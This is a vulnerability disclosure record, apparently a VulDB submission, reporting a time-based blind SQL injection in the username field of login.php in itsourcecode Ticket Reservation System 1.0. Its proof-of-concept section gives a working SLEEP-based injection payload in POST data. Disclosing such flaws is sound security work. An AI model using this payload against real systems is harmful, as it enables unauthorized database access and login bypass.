| Title | itsourcecode Ticket Reservation System 1.0 SQLi login.php |
|---|
| Description | In the login.php page, because the username field is not strictly filtered, it is possible to achieve SQL injection by constructing a specially crafted data packet.
--------------POC--------------
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 9494 FROM (SELECT(SLEEP(5)))FbJR) AND 'GlKq'='GlKq&password=123123 |
|---|
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE10-1.md |
|---|
| User | Dee.Mirage (UID 71702) |
|---|
| Submission | 07/31/2024 07:21 (2 years ago) |
|---|
| Moderation | 08/02/2024 23:43 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 273529 [itsourcecode Ticket Reservation System 1.0 Login Page login.php Username sql injection] |
|---|
| Points | 20 |
|---|